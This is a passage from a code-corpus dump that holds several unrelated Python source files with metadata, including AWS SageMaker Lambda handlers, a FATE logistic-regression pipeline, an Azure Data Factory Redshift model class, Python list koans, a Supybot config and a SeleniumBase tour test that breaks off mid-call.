| micropolis/MicropolisCore/src/pyMicropolis/micropolisEngine/micropolisnoticepanel.py | 5,886 | micropolisnoticepanel.py Micropolis, Unix Version. This game was released for the Unix platform in or about 1990 and has been modified for inclusion in the One Laptop Per Child program. Copyright (C) 1989 - 2007 Electronic Arts Inc. If you need assistance with this program, you may contact: http://wiki.laptop.org/go/Micropolis or email micropolis@laptop.org. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. ADDITIONAL TERMS per GNU GPL Section 7 No trademark or publicity rights are granted. This license does NOT give you any right, title or interest in the trademark SimCity or any other Electronic Arts trademark. You may not distribute any modification of this program using the trademark SimCity or claim any affliation or association with Electronic Arts Inc. or its employees. Any propagation or conveyance of this program must include this copyright notice and these terms. If you convey this program (or any modifications of it) and assume contractual liability for the program to recipients of it, you agree to indemnify Electronic Arts for any liability that those contractual assumptions impose on Electronic Arts. You may not misrepresent the origins of this program; modified versions of the program must be marked as such and not identified as the original program. This disclaimer supplements the one included in the General Public License. TO THE FULLEST EXTENT PERMISSIBLE UNDER APPLICABLE LAW, THIS PROGRAM IS PROVIDED TO YOU "AS IS," WITH ALL FAULTS, WITHOUT WARRANTY OF ANY KIND, AND YOUR USE IS AT YOUR SOLE RISK. THE ENTIRE RISK OF SATISFACTORY QUALITY AND PERFORMANCE RESIDES WITH YOU. ELECTRONIC ARTS DISCLAIMS ANY AND ALL EXPRESS, IMPLIED OR STATUTORY WARRANTIES, INCLUDING IMPLIED WARRANTIES OF MERCHANTABILITY, SATISFACTORY QUALITY, FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT OF THIRD PARTY RIGHTS, AND WARRANTIES (IF ANY) ARISING FROM A COURSE OF DEALING, USAGE, OR TRADE PRACTICE. ELECTRONIC ARTS DOES NOT WARRANT AGAINST INTERFERENCE WITH YOUR ENJOYMENT OF THE PROGRAM; THAT THE PROGRAM WILL MEET YOUR REQUIREMENTS; THAT OPERATION OF THE PROGRAM WILL BE UNINTERRUPTED OR ERROR-FREE, OR THAT THE PROGRAM WILL BE COMPATIBLE WITH THIRD PARTY SOFTWARE OR THAT ANY ERRORS IN THE PROGRAM WILL BE CORRECTED. NO ORAL OR WRITTEN ADVICE PROVIDED BY ELECTRONIC ARTS OR ANY AUTHORIZED REPRESENTATIVE SHALL CREATE A WARRANTY. SOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OF OR LIMITATIONS ON IMPLIED WARRANTIES OR THE LIMITATIONS ON THE APPLICABLE STATUTORY RIGHTS OF A CONSUMER, SO SOME OR ALL OF THE ABOVE EXCLUSIONS AND LIMITATIONS MAY NOT APPLY TO YOU. Micropolis Status View Don Hopkins Import stuff MicropolisNoticePanel Viewsprint "setMapViewVisible", visible, tileX, tileY, self.mapViewVisible | 3,319 | en | 0.894164 |
import json
import datetime
import time
import boto3
import os
def train_and_generate_recommendations(event, context):
# 200 is the HTTP status code for "ok".
status_code = 200
try:
# From the input parameter named "event", get the body, which contains
# the input rows.
event_body = event["body"]
# Convert the input from a JSON string into a JSON object.
payload = json.loads(event_body)
# This is basically an array of arrays. The inner array contains the
# row number, and a value for each parameter passed to the function.
rows = payload["data"]
# For each input row in the JSON object...
for row in rows:
# Read the input row number (the output row number will be the same).
row_number = row[0]
# Read the first input parameter's value. For example, this can be a
# numeric value or a string, or it can be a compound value such as
# a JSON structure.
_input_table_name = row[1]
_output_table_name = row[2]
# start the SageMaker training job
client = boto3.client('sagemaker')
bucket = os.environ['s3_bucket']
prefix = "training-job-" + time.strftime("%Y%m%d%H%M%S")
s3_output_location = 's3://{}/'.format(bucket)
print(s3_output_location)
training_job_name = prefix
TRAINING_IMAGE_ECR_PATH = os.environ['training_image_ecr_path']
SAGEMAKER_ROLE_ARN = os.environ['sagemaker_role_arn']
response = client.create_training_job(
TrainingJobName=training_job_name,
HyperParameters=dict(input_table_name=_input_table_name, output_table_name=_output_table_name, region=os.environ['region']),
AlgorithmSpecification={
'TrainingImage': TRAINING_IMAGE_ECR_PATH,
'TrainingInputMode': 'File'
},
RoleArn=SAGEMAKER_ROLE_ARN,
OutputDataConfig={
'S3OutputPath': s3_output_location
},
ResourceConfig={
'InstanceType': 'ml.m5.xlarge',
'InstanceCount': 1,
'VolumeSizeInGB': 10
},
StoppingCondition={
'MaxRuntimeInSeconds': 10000
}
)
training_job_arn = response['TrainingJobArn']
print(training_job_arn)
array_of_rows_to_return = []
# Put the returned row number and the returned value into an array.
row_to_return = [0, training_job_arn]
# ... and add that array to the main array.
array_of_rows_to_return.append(row_to_return)
json_compatible_string_to_return = json.dumps({"data" : array_of_rows_to_return})
except Exception as err:
# 400 implies some type of error.
status_code = 400
# Tell caller what this function could not handle.
print(err)
json_compatible_string_to_return = str(err)
# Return the return value and HTTP status code.
return {
'statusCode': status_code,
'body': json_compatible_string_to_return
}
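# --- Editor's illustrative sketch (not part of the original handler) ---
# The functions in this module follow the "array of arrays" contract described in
# the comments above: the request body carries {"data": [[row_number, param1,
# param2, ...], ...]} and the response mirrors that shape. The table names used
# below are hypothetical placeholders.
def _example_training_event():
    return {
        "body": json.dumps({
            "data": [
                [0, "USER_ITEM_INTERACTIONS", "USER_ITEM_RECOMMENDATIONS"]
            ]
        })
    }
# Calling train_and_generate_recommendations(_example_training_event(), context=None)
# would return {"statusCode": 200, "body": '{"data": [[0, "<training job ARN>"]]}'}
# on success.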
def deploy_model(event, context):
# 200 is the HTTP status code for "ok".
status_code = 200
try:
# From the input parameter named "event", get the body, which contains
# the input rows.
event_body = event["body"]
# Convert the input from a JSON string into a JSON object.
payload = json.loads(event_body)
# This is basically an array of arrays. The inner array contains the
# row number, and a value for each parameter passed to the function.
rows = payload["data"]
# For each input row in the JSON object...
for row in rows:
# Read the input row number (the output row number will be the same).
row_number = row[0]
# Read the first input parameter's value.
model_name = row[1]
model_data_url = row[2]
            # create the SageMaker model, endpoint config and endpoint
client = boto3.client('sagemaker')
ECR_PATH = os.environ['training_image_ecr_path']
SAGEMAKER_ROLE_ARN = os.environ['sagemaker_role_arn']
response = client.create_model(
ModelName=model_name,
PrimaryContainer={
'Image': ECR_PATH,
'ModelDataUrl': model_data_url
},
ExecutionRoleArn=SAGEMAKER_ROLE_ARN
)
print(response)
print("now trying to create endpoint config...")
response = client.create_endpoint_config(
EndpointConfigName=model_name,
ProductionVariants=[
{
'VariantName': 'variant-1',
'ModelName': model_name,
'InitialInstanceCount': 1,
'InstanceType': 'ml.t2.medium'
}
]
)
print(response)
print("now trying to create the endpoint...")
response = client.create_endpoint(
EndpointName=model_name,
EndpointConfigName=model_name
)
endpoint_arn = response['EndpointArn']
print(endpoint_arn)
array_of_rows_to_return = []
# Put the returned row number and the returned value into an array.
row_to_return = [0, endpoint_arn]
# ... and add that array to the main array.
array_of_rows_to_return.append(row_to_return)
json_compatible_string_to_return = json.dumps({"data" : array_of_rows_to_return})
except Exception as err:
# 400 implies some type of error.
status_code = 400
# Tell caller what this function could not handle.
print(err)
json_compatible_string_to_return = str(err)
# Return the return value and HTTP status code.
return {
'statusCode': status_code,
'body': json_compatible_string_to_return
}
# function that performs real-time prediction
def invoke_model(event, context):
# 200 is the HTTP status code for "ok".
status_code = 200
try:
# From the input parameter named "event", get the body, which contains
# the input rows.
event_body = event["body"]
# Convert the input from a JSON string into a JSON object.
payload = json.loads(event_body)
# This is basically an array of arrays. The inner array contains the
# row number, and a value for each parameter passed to the function.
rows = payload["data"]
# For each input row in the JSON object...
body = ""
for row in rows:
model_name = row[1]
# extract and transform the user_ids and item_ids posted to csv
body = body + row[2] + "," + row[3] + "\n"
# invoke the SageMaker endpoint
client = boto3.client('sagemaker-runtime')
response = client.invoke_endpoint(
EndpointName=model_name,
Body=body.encode('utf-8'),
ContentType='text/csv'
)
predictions = response["Body"].read().decode('utf-8')
i = 0
array_of_rows_to_return = []
for prediction in iter(predictions.splitlines()):
# Put the returned row number and the returned value into an array.
row_to_return = [i, prediction]
# ... and add that array to the main array.
array_of_rows_to_return.append(row_to_return)
i = i + 1
json_compatible_string_to_return = json.dumps({"data" : array_of_rows_to_return})
except Exception as err:
# 400 implies some type of error.
status_code = 400
# Tell caller what this function could not handle.
print(err)
json_compatible_string_to_return = str(err)
# Return the return value and HTTP status code.
return {
'statusCode': status_code,
'body': json_compatible_string_to_return
} | sls/handler.py | 8,037 | 200 is the HTTP status code for "ok". From the input parameter named "event", get the body, which contains the input rows. Convert the input from a JSON string into a JSON object. This is basically an array of arrays. The inner array contains the row number, and a value for each parameter passed to the function. For each input row in the JSON object... Read the input row number (the output row number will be the same). Read the first input parameter's value. For example, this can be a numeric value or a string, or it can be a compound value such as a JSON structure. start the SageMaker training job Put the returned row number and the returned value into an array. ... and add that array to the main array. 400 implies some type of error. Tell caller what this function could not handle. Return the return value and HTTP status code. 200 is the HTTP status code for "ok". From the input parameter named "event", get the body, which contains the input rows. Convert the input from a JSON string into a JSON object. This is basically an array of arrays. The inner array contains the row number, and a value for each parameter passed to the function. For each input row in the JSON object... Read the input row number (the output row number will be the same). Read the first input parameter's value. start the SageMaker training job Put the returned row number and the returned value into an array. ... and add that array to the main array. 400 implies some type of error. Tell caller what this function could not handle. Return the return value and HTTP status code. function that performs real-time prediction 200 is the HTTP status code for "ok". From the input parameter named "event", get the body, which contains the input rows. Convert the input from a JSON string into a JSON object. This is basically an array of arrays. The inner array contains the row number, and a value for each parameter passed to the function. For each input row in the JSON object... extract and transform the user_ids and item_ids posted to csv invoke the SageMaker endpoint Put the returned row number and the returned value into an array. ... and add that array to the main array. 400 implies some type of error. Tell caller what this function could not handle. Return the return value and HTTP status code. | 2,298 | en | 0.74251 |
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import json
from pipeline.backend.pipeline import PipeLine
from pipeline.component.dataio import DataIO
from pipeline.component.homo_lr import HomoLR
from pipeline.component.reader import Reader
from pipeline.component.scale import FeatureScale
from pipeline.interface.data import Data
from pipeline.utils.tools import load_job_config
from pipeline.runtime.entity import JobParameters
def main(config="../../config.yaml", namespace=""):
# obtain config
if isinstance(config, str):
config = load_job_config(config)
parties = config.parties
guest = parties.guest[0]
host = parties.host[0]
arbiter = parties.arbiter[0]
backend = config.backend
work_mode = config.work_mode
guest_train_data = {"name": "breast_homo_guest", "namespace": f"experiment{namespace}"}
host_train_data = {"name": "breast_homo_host", "namespace": f"experiment{namespace}"}
# initialize pipeline
pipeline = PipeLine()
# set job initiator
pipeline.set_initiator(role='guest', party_id=guest)
# set participants information
pipeline.set_roles(guest=guest, host=host, arbiter=arbiter)
# define Reader components to read in data
reader_0 = Reader(name="reader_0")
# configure Reader for guest
reader_0.get_party_instance(role='guest', party_id=guest).component_param(table=guest_train_data)
# configure Reader for host
reader_0.get_party_instance(role='host', party_id=host).component_param(table=host_train_data)
# define DataIO components
dataio_0 = DataIO(name="dataio_0", with_label=True, output_format="dense") # start component numbering at 0
scale_0 = FeatureScale(name='scale_0')
param = {
"penalty": "L2",
"optimizer": "sgd",
"tol": 1e-05,
"alpha": 0.01,
"max_iter": 3,
"early_stop": "diff",
"batch_size": 320,
"learning_rate": 0.15,
"decay": 1.0,
"decay_sqrt": True,
"init_param": {
"init_method": "zeros"
},
"encrypt_param": {
"method": None
},
"cv_param": {
"n_splits": 5,
"shuffle": True,
"random_seed": 33,
"need_cv": True
}
}
homo_lr_0 = HomoLR(name='homo_lr_0', **param)
# add components to pipeline, in order of task execution
pipeline.add_component(reader_0)
pipeline.add_component(dataio_0, data=Data(data=reader_0.output.data))
    # set data input sources of the downstream components
pipeline.add_component(scale_0, data=Data(data=dataio_0.output.data))
pipeline.add_component(homo_lr_0, data=Data(train_data=scale_0.output.data))
# compile pipeline once finished adding modules, this step will form conf and dsl files for running job
pipeline.compile()
# fit model
job_parameters = JobParameters(backend=backend, work_mode=work_mode)
pipeline.fit(job_parameters)
# query component summary
print(json.dumps(pipeline.get_component("homo_lr_0").get_summary(), indent=4, ensure_ascii=False))
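# Editor's note (illustrative, not part of the original example): the job can be
# launched through the CLI entry point below, e.g.
#     python pipeline-homo-lr-cv.py -config ../../config.yaml
# or invoked directly from Python:
#     main(config="../../config.yaml", namespace="_demo")   # namespace suffix is optional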
if __name__ == "__main__":
parser = argparse.ArgumentParser("PIPELINE DEMO")
parser.add_argument("-config", type=str,
help="config file")
args = parser.parse_args()
if args.config is not None:
main(args.config)
else:
main()
| examples/pipeline/homo_logistic_regression/pipeline-homo-lr-cv.py | 3,975 | Copyright 2019 The FATE Authors. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. obtain config initialize pipeline set job initiator set participants information define Reader components to read in data configure Reader for guest configure Reader for host define DataIO components start component numbering at 0 add components to pipeline, in order of task execution set data input sources of intersection components compile pipeline once finished adding modules, this step will form conf and dsl files for running job fit model query component summary | 1,056 | en | 0.825279 |
# AutoTransform
# Large scale, component based code modification library
#
# Licensed under the MIT License <http://opensource.org/licenses/MIT>
# SPDX-License-Identifier: MIT
# Copyright (c) 2022-present Nathan Rockenbach <http://github.com/nathro>
# @black_format
"""A change represents a submission from a run of AutoTransform on a particular Batch. They
are used for managing submissions to code review/source control systems. A pull request is
an example of a potential change."""
| src/python/autotransform/change/__init__.py | 488 | A change represents a submission from a run of AutoTransform on a particular Batch. They
are used for managing submissions to code review/source control systems. A pull request is
an example of a potential change.
AutoTransform Large scale, component based code modification library Licensed under the MIT License <http://opensource.org/licenses/MIT> SPDX-License-Identifier: MIT Copyright (c) 2022-present Nathan Rockenbach <http://github.com/nathro> @black_format | 467 | en | 0.688555 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .linked_service_py3 import LinkedService
class AmazonRedshiftLinkedService(LinkedService):
"""Linked service for Amazon Redshift.
All required parameters must be populated in order to send to Azure.
:param additional_properties: Unmatched properties from the message are
     deserialized to this collection
:type additional_properties: dict[str, object]
:param connect_via: The integration runtime reference.
:type connect_via:
~azure.mgmt.datafactory.models.IntegrationRuntimeReference
:param description: Linked service description.
:type description: str
:param parameters: Parameters for linked service.
:type parameters: dict[str,
~azure.mgmt.datafactory.models.ParameterSpecification]
:param annotations: List of tags that can be used for describing the
Dataset.
:type annotations: list[object]
:param type: Required. Constant filled by server.
:type type: str
:param server: Required. The name of the Amazon Redshift server. Type:
string (or Expression with resultType string).
:type server: object
:param username: The username of the Amazon Redshift source. Type: string
(or Expression with resultType string).
:type username: object
:param password: The password of the Amazon Redshift source.
:type password: ~azure.mgmt.datafactory.models.SecretBase
:param database: Required. The database name of the Amazon Redshift
source. Type: string (or Expression with resultType string).
:type database: object
:param port: The TCP port number that the Amazon Redshift server uses to
listen for client connections. The default value is 5439. Type: integer
(or Expression with resultType integer).
:type port: object
:param encrypted_credential: The encrypted credential used for
authentication. Credentials are encrypted using the integration runtime
credential manager. Type: string (or Expression with resultType string).
:type encrypted_credential: object
"""
_validation = {
'type': {'required': True},
'server': {'required': True},
'database': {'required': True},
}
_attribute_map = {
'additional_properties': {'key': '', 'type': '{object}'},
'connect_via': {'key': 'connectVia', 'type': 'IntegrationRuntimeReference'},
'description': {'key': 'description', 'type': 'str'},
'parameters': {'key': 'parameters', 'type': '{ParameterSpecification}'},
'annotations': {'key': 'annotations', 'type': '[object]'},
'type': {'key': 'type', 'type': 'str'},
'server': {'key': 'typeProperties.server', 'type': 'object'},
'username': {'key': 'typeProperties.username', 'type': 'object'},
'password': {'key': 'typeProperties.password', 'type': 'SecretBase'},
'database': {'key': 'typeProperties.database', 'type': 'object'},
'port': {'key': 'typeProperties.port', 'type': 'object'},
'encrypted_credential': {'key': 'typeProperties.encryptedCredential', 'type': 'object'},
}
def __init__(self, *, server, database, additional_properties=None, connect_via=None, description: str=None, parameters=None, annotations=None, username=None, password=None, port=None, encrypted_credential=None, **kwargs) -> None:
super(AmazonRedshiftLinkedService, self).__init__(additional_properties=additional_properties, connect_via=connect_via, description=description, parameters=parameters, annotations=annotations, **kwargs)
self.server = server
self.username = username
self.password = password
self.database = database
self.port = port
self.encrypted_credential = encrypted_credential
self.type = 'AmazonRedshift'
| sdk/datafactory/azure-mgmt-datafactory/azure/mgmt/datafactory/models/amazon_redshift_linked_service_py3.py | 4,238 | Linked service for Amazon Redshift.
All required parameters must be populated in order to send to Azure.
:param additional_properties: Unmatched properties from the message are
deserialized this collection
:type additional_properties: dict[str, object]
:param connect_via: The integration runtime reference.
:type connect_via:
~azure.mgmt.datafactory.models.IntegrationRuntimeReference
:param description: Linked service description.
:type description: str
:param parameters: Parameters for linked service.
:type parameters: dict[str,
~azure.mgmt.datafactory.models.ParameterSpecification]
:param annotations: List of tags that can be used for describing the
Dataset.
:type annotations: list[object]
:param type: Required. Constant filled by server.
:type type: str
:param server: Required. The name of the Amazon Redshift server. Type:
string (or Expression with resultType string).
:type server: object
:param username: The username of the Amazon Redshift source. Type: string
(or Expression with resultType string).
:type username: object
:param password: The password of the Amazon Redshift source.
:type password: ~azure.mgmt.datafactory.models.SecretBase
:param database: Required. The database name of the Amazon Redshift
source. Type: string (or Expression with resultType string).
:type database: object
:param port: The TCP port number that the Amazon Redshift server uses to
listen for client connections. The default value is 5439. Type: integer
(or Expression with resultType integer).
:type port: object
:param encrypted_credential: The encrypted credential used for
authentication. Credentials are encrypted using the integration runtime
credential manager. Type: string (or Expression with resultType string).
:type encrypted_credential: object
coding=utf-8 -------------------------------------------------------------------------- Copyright (c) Microsoft Corporation. All rights reserved. Licensed under the MIT License. See License.txt in the project root for license information. Code generated by Microsoft (R) AutoRest Code Generator. Changes may cause incorrect behavior and will be lost if the code is regenerated. -------------------------------------------------------------------------- | 2,228 | en | 0.610655 |
import os,sys
import numpy as np
import h5py, time, argparse, itertools, datetime
from scipy import ndimage
import torchvision.utils as vutils
# tensorboardX
from tensorboardX import SummaryWriter
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
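def _average_meter_demo():
    """Editor's sketch (not part of the original module): how AverageMeter tracks a
    running, count-weighted average. The loss values below are made-up numbers."""
    meter = AverageMeter()
    for loss, batch_size in [(0.90, 8), (0.70, 8), (0.50, 4)]:
        meter.update(loss, n=batch_size)
    return meter.val, meter.avg  # last value and weighted running average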
def get_logger(args):
log_name = args.output+'/log'
date = str(datetime.datetime.now()).split(' ')[0]
time = str(datetime.datetime.now()).split(' ')[1].split('.')[0]
log_name += date+'_'+time
    logger = open(log_name + '.txt', 'w', buffering=1)  # line-buffered, so lines are written out promptly
# tensorboardX
writer = SummaryWriter('runs/'+log_name)
return logger, writer
| torch_connectomics/io/misc.py | 961 | Computes and stores the average and current value
tensorboardX unbuffered, write instantly tensorboardX | 105 | en | 0.913621 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Based on AboutArrays in the Ruby Koans
#
from runner.koan import *
class AboutLists(Koan):
def test_creating_lists(self):
empty_list = list()
self.assertEqual(list, type(empty_list))
self.assertEqual(0, len(empty_list))
def test_list_literals(self):
nums = list()
self.assertEqual([], nums)
nums[0:] = [1]
self.assertEqual([1], nums)
nums[1:] = [2]
self.assertListEqual([1, 2], nums)
nums.append(333)
self.assertListEqual([1, 2, 333], nums)
def test_accessing_list_elements(self):
noms = ['peanut', 'butter', 'and', 'jelly']
self.assertEqual('peanut', noms[0])
self.assertEqual('jelly', noms[3])
self.assertEqual('jelly', noms[-1])
self.assertEqual('butter', noms[-3])
def test_slicing_lists(self):
noms = ['peanut', 'butter', 'and', 'jelly']
self.assertEqual(['peanut'], noms[0:1])
self.assertEqual(['peanut','butter'], noms[0:2])
self.assertEqual([], noms[2:2])
self.assertEqual(['and','jelly'], noms[2:20])
self.assertEqual([], noms[4:0])
self.assertEqual([], noms[4:100])
self.assertEqual([], noms[5:0])
def test_slicing_to_the_edge(self):
noms = ['peanut', 'butter', 'and', 'jelly']
self.assertEqual(['and','jelly'], noms[2:])
self.assertEqual(['peanut','butter'], noms[:2])
def test_lists_and_ranges(self):
self.assertEqual(range, type(range(5)))
self.assertNotEqual([1, 2, 3, 4, 5], range(1,6))
self.assertEqual ([0,1,2,3,4], list(range(5)))
self.assertEqual([5,6,7,8], list(range(5, 9)))
def test_ranges_with_steps(self):
self.assertEqual([5,4], list(range(5, 3, -1)))
self.assertEqual([0,2,4,6], list(range(0, 8, 2)))
self.assertEqual([1,4,7], list(range(1, 8, 3)))
self.assertEqual([5,1,-3], list(range(5, -7, -4)))
self.assertEqual([5,1,-3,-7], list(range(5, -8, -4)))
def test_insertions(self):
knight = ['you', 'shall', 'pass']
knight.insert(2, 'not')
self.assertEqual(['you', 'shall', 'not', 'pass'], knight)
knight.insert(0, 'Arthur')
self.assertEqual(['Arthur','you', 'shall', 'not', 'pass' ], knight)
def test_popping_lists(self):
stack = [10, 20, 30, 40]
stack.append('last')
self.assertEqual([10, 20, 30, 40, 'last'], stack)
popped_value = stack.pop()
self.assertEqual('last', popped_value)
self.assertEqual([10, 20, 30, 40], stack)
popped_value = stack.pop(1)
self.assertEqual(20, popped_value)
self.assertEqual([10, 30, 40], stack)
# Notice that there is a "pop" but no "push" in python?
# Part of the Python philosophy is that there ideally should be one and
# only one way of doing anything. A 'push' is the same as an 'append'.
# To learn more about this try typing "import this" from the python
# console... ;)
def test_making_queues(self):
queue = [1, 2]
queue.append('last')
self.assertEqual([1,2,'last'], queue)
popped_value = queue.pop(0)
self.assertEqual(1, popped_value)
self.assertEqual([2,'last'], queue)
# Note, popping from the left hand side of a list is
# inefficient. Use collections.deque instead.
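    # Editor's sketch (not part of the original koan set): the same queue built on
    # collections.deque, where popping from the left is O(1).
    def test_making_queues_with_deque(self):
        from collections import deque
        queue = deque([1, 2])
        queue.append('last')
        self.assertEqual([1, 2, 'last'], list(queue))
        popped_value = queue.popleft()
        self.assertEqual(1, popped_value)
        self.assertEqual([2, 'last'], list(queue))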
| python3/koans/about_lists.py | 3,461 | !/usr/bin/env python -*- coding: utf-8 -*- Based on AboutArrays in the Ruby Koans Notice that there is a "pop" but no "push" in python? Part of the Python philosophy is that there ideally should be one and only one way of doing anything. A 'push' is the same as an 'append'. To learn more about this try typing "import this" from the python console... ;) Note, popping from the left hand side of a list is inefficient. Use collections.deque instead. | 449 | en | 0.906676 |
###
# Copyright (c) 2002-2005, Jeremiah Fincher
# Copyright (c) 2009, James McCoy
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions, and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions, and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the author of this software nor the name of
# contributors to this software may be used to endorse or promote products
# derived from this software without specific prior written consent.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
###
import supybot.conf as conf
import supybot.registry as registry
def configure(advanced):
# This will be called by supybot to configure this module. advanced is
# a bool that specifies whether the user identified himself as an advanced
# user or not. You should effect your configuration by manipulating the
# registry as appropriate.
from supybot.questions import expect, anything, something, yn
conf.registerPlugin('Factoids', True)
class FactoidFormat(registry.TemplatedString):
"""Value must include $value, otherwise the factoid's value would be left
out."""
requiredTemplates = ['value']
Factoids = conf.registerPlugin('Factoids')
conf.registerChannelValue(Factoids, 'learnSeparator',
registry.String('as', """Determines what separator must be used in the
learn command. Defaults to 'as' -- learn <key> as <value>. Users might
feel more comfortable with 'is' or something else, so it's
configurable."""))
conf.registerChannelValue(Factoids, 'showFactoidIfOnlyOneMatch',
registry.Boolean(True, """Determines whether the bot will reply with the
single matching factoid if only one factoid matches when using the search
command."""))
conf.registerChannelValue(Factoids, 'replyWhenInvalidCommand',
registry.Boolean(True, """Determines whether the bot will reply to invalid
commands by searching for a factoid; basically making the whatis
unnecessary when you want all factoids for a given key."""))
conf.registerChannelValue(Factoids, 'format',
FactoidFormat('$key could be $value.', """Determines the format of
the response given when a factoid's value is requested. All the standard
substitutes apply, in addition to "$key" for the factoid's key and "$value"
for the factoid's value."""))
# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:
| plugins/Factoids/config.py | 3,478 | Value must include $value, otherwise the factoid's value would be left
out.
Copyright (c) 2002-2005, Jeremiah Fincher Copyright (c) 2009, James McCoy All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions, and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions, and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the author of this software nor the name of contributors to this software may be used to endorse or promote products derived from this software without specific prior written consent. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. This will be called by supybot to configure this module. advanced is a bool that specifies whether the user identified himself as an advanced user or not. You should effect your configuration by manipulating the registry as appropriate. vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79: | 1,935 | en | 0.891316 |
from seleniumbase import BaseCase
class MyTourClass(BaseCase):
def test_google_tour(self):
self.open('https://google.com/ncr')
self.wait_for_element('input[title="Search"]')
# Create a website tour using the ShepherdJS library with "dark" theme
# Same as: self.create_shepherd_tour(theme="dark")
self.create_tour(theme="dark")
self.add_tour_step("Welcome to Google!", title="SeleniumBase Tours")
self.add_tour_step("Type in your query here.", 'input[title="Search"]')
self.play_tour()
self.highlight_update_text('input[title="Search"]', "Google")
self.wait_for_element('[role="listbox"]') # Wait for autocomplete
# Create a website tour using the ShepherdJS library with "light" theme
# Same as: self.create_shepherd_tour(theme="light")
self.create_tour(theme="light")
self.add_tour_step("Then click to search.", '[value="Google Search"]')
self.add_tour_step("Or press [ENTER] after entry.", '[title="Search"]')
self.play_tour()
self.highlight_update_text('input[title="Search"]', "GitHub\n")
self.wait_for_element("#search")
# Create a website tour using the Bootstrap Tour JS library
# Same as: self.create_bootstrap_tour()
self.create_tour(theme="bootstrap")
self.add_tour_step("See Results Here!", title="(5-second autoplay)")
self.add_tour_step("Here's the next tour:")
self.play_tour(interval=5) # Tour automatically continues after 5 sec
self.open("https://www.google.com/maps/@42.3598616,-71.0912631,15z")
self.wait_for_element("#searchboxinput")
self.wait_for_element("#minimap")
self.wait_for_element("#zoom")
# Create a website tour using the IntroJS library
# Same as: self.create_introjs_tour()
self.create_tour(theme="introjs")
self.add_tour_step("Welcome to Google Maps!")
self.add_tour_step("Type in a location here.",
"#searchboxinput", title="Search Box")
self.add_tour_step("Then click here to show it on the map.",
